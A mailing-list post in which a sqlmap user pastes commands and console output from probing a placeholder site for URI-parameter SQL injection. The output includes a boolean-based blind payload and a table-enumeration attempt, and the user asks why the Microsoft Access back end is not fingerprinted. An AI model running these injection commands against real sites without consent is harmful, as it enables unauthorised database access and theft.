Hi,

I am using sqlmap to scan a specific GET parameter of a target site. I know 
there is a SQL injection in parameter 2:

python sqlmap.py -u "http://example.net/de/de*/site" --batch

sqlmap gives me the following result:

> …
> [16:36:19] [INFO] heuristic test shows that URI parameter '#1*' might be 
> injectable (possible DBMS: Microsoft Access)
> [16:36:19] [INFO] testing for SQL injection on URI parameter '#1*'
> [16:36:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [16:36:29] [INFO] URI parameter '#1*' is 'AND boolean-based blind - WHERE or 
> HAVING clause' injectable 
> [16:36:29] [INFO] parsed error message(s) showed that the back-end DBMS could 
> be Microsoft Access. Do you want to skip test payloads specific for other 
> DBMSes? [Y/n] Y
> [16:36:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
> [16:36:29] [INFO] automatically extending ranges for UNION query injection 
> technique tests as there is at least one other potential injection technique 
> found
> [16:37:05] [INFO] checking if the injection point on URI parameter '#1*' is a 
> false positive
> [16:37:11] [INFO] URI parameter '#1*' is vulnerable. Do you want to keep 
> testing the others (if any)? [y/N] N
> sqlmap identified the following injection points with a total of 34 HTTP(s) 
> requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:37:11] [INFO] testing Microsoft Access
> [16:37:13] [INFO] confirming Microsoft Access
> [16:37:14] [WARNING] the back-end DBMS is not Microsoft Access
> [16:37:14] [INFO] testing MySQL
> [16:37:16] [WARNING] the back-end DBMS is not MySQL
> [16:37:16] [INFO] testing Oracle
> [16:37:17] [WARNING] the back-end DBMS is not Oracle
> [16:37:17] [INFO] testing PostgreSQL
> [16:37:18] [WARNING] the back-end DBMS is not PostgreSQL
> [16:37:18] [INFO] testing Microsoft SQL Server
> [16:37:19] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:37:19] [INFO] testing SQLite
> [16:37:20] [WARNING] the back-end DBMS is not SQLite
> [16:37:20] [INFO] testing Firebird
> [16:37:21] [WARNING] the back-end DBMS is not Firebird
> [16:37:21] [INFO] testing SAP MaxDB
> [16:37:22] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:37:22] [INFO] testing Sybase
> [16:37:23] [WARNING] the back-end DBMS is not Sybase
> [16:37:23] [INFO] testing IBM DB2
> [16:37:24] [WARNING] the back-end DBMS is not IBM DB2
> [16:37:24] [CRITICAL] sqlmap was not able to fingerprint the back-end 
> database management system, but from the HTML error page it was possible to 
> determinate that the back-end DBMS is Microsoft Access. Do not specify the 
> back-end DBMS manually, sqlmap will fingerprint the DBMS for you
> [16:37:24] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 24 times, 500 (Internal Server Error) - 20 times
> 
> [*] shutting down at 16:37:24

I am confused at this point: Is sqlmap thinking that the DBMS is MS Access or 
not?
When I manually try the following URL in my browser 
"http://example.net/de/de'/site" I get a 500 HTML page with the output "Microsoft 
JET Database Engine Error …", so I would say the DBMS is MS Access.
When I now try to get, for example, all tables, the following happens:

> python sqlmap.py -u "example.net/de/de*/site" --batch --tables
> 
>     sqlmap/1.0-dev-0664e72 - automatic SQL injection and database takeover 
> tool
>     http://sqlmap.org
> 
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior 
> mutual consent is illegal. It is the end user's responsibility to obey all 
> applicable local, state and federal laws. Developers assume no liability and 
> are not responsible for any misuse or damage caused by this program
> 
> [*] starting at 16:38:02
> 
> [16:38:05] [INFO] custom injection marking character ('*') found in option 
> '-u'. Do you want to process it? [Y/n/q] Y
> [16:38:05] [INFO] testing connection to the target url
> sqlmap identified the following injection points with a total of 0 HTTP(s) 
> requests:
> ---
> Place: URI
> Parameter: #1*
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: http://example.net:80/de/de' AND 9199=9199 AND 'tyFW'='tyFW/site
> ---
> [16:38:07] [INFO] testing MySQL
> [16:38:08] [INFO] heuristics detected web page charset 'ascii'
> [16:38:08] [WARNING] the back-end DBMS is not MySQL
> [16:38:08] [INFO] testing Oracle
> [16:38:09] [INFO] heuristics detected web page charset 'ISO-8859-2'
> [16:38:09] [WARNING] the back-end DBMS is not Oracle
> [16:38:09] [INFO] testing PostgreSQL
> [16:38:10] [WARNING] reflective value(s) found and filtering out
> [16:38:10] [WARNING] the back-end DBMS is not PostgreSQL
> [16:38:10] [INFO] testing Microsoft SQL Server
> [16:38:11] [WARNING] the back-end DBMS is not Microsoft SQL Server
> [16:38:11] [INFO] testing SQLite
> [16:38:12] [WARNING] the back-end DBMS is not SQLite
> [16:38:12] [INFO] testing Microsoft Access
> [16:38:12] [INFO] confirming Microsoft Access
> [16:38:13] [WARNING] the back-end DBMS is not Microsoft Access
> [16:38:13] [INFO] testing Firebird
> [16:38:14] [WARNING] the back-end DBMS is not Firebird
> [16:38:14] [INFO] testing SAP MaxDB
> [16:38:15] [WARNING] the back-end DBMS is not SAP MaxDB
> [16:38:15] [INFO] testing Sybase
> [16:38:16] [WARNING] the back-end DBMS is not Sybase
> [16:38:16] [INFO] testing IBM DB2
> [16:38:17] [WARNING] the back-end DBMS is not IBM DB2
> [16:38:17] [CRITICAL] sqlmap was not able to fingerprint the back-end 
> database management system. Support for this DBMS will be implemented at some 
> point
> [16:38:17] [WARNING] HTTP error codes detected during testing:
> 400 (Bad Request) - 1 times, 500 (Internal Server Error) - 9 times
> 
> [*] shutting down at 16:38:17

Even when I try to use the --text-only or --not-string switches, I am not able to 
receive the tables. Any ideas?


Best regards

Volker Nebelung

_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
